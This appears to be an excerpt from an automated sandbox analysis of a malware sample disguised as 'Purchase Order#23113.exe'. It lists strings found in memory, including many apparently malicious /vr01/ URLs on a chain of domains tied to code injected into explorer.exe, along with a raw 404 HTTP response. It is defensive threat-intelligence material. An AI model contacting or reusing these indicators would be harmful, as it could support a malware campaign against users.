          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Apr 2024 08:06:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: Purchase Order#23113.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Purchase Order#23113.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: Purchase Order#23113.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1779124228.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776990412.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776251589.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Purchase Order#23113.exeString found in binary or memory: http://tempuri.org/DataSet1.xsdAAsistencias.Properties.Resources
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.3105954537.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brandonbirk.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brandonbirk.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brandonbirk.com/vr01/www.snugandkind.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brandonbirk.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.com
          Source: explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/www.sampleshubusa.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop/vr01/www.entelnegocio.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shopReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com/vr01/www.mks-digital.net
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com/vr01/www.yoursweets.online
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net/vr01/www.brandonbirk.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.netReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co/vr01/www.gratiasempirellc.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.coReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop/vr01/www.yesxoit.xyz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shopReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000000.00000002.1773771205.0000000006170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com/vr01/www.topdeals.biz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com/vr01/www.owletbaby.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com/vr01/www.oregonjobs.co
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/www.kidscircle.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.bizReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info/vr01/www.mingshengglass.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.infoReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/www.studioenginedemo.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/www.massagechairspecialists.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.onlineReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000002.4209139867.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1780447138.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000002.4199885899.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773684404.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107031685.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4201075329.000000000371D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
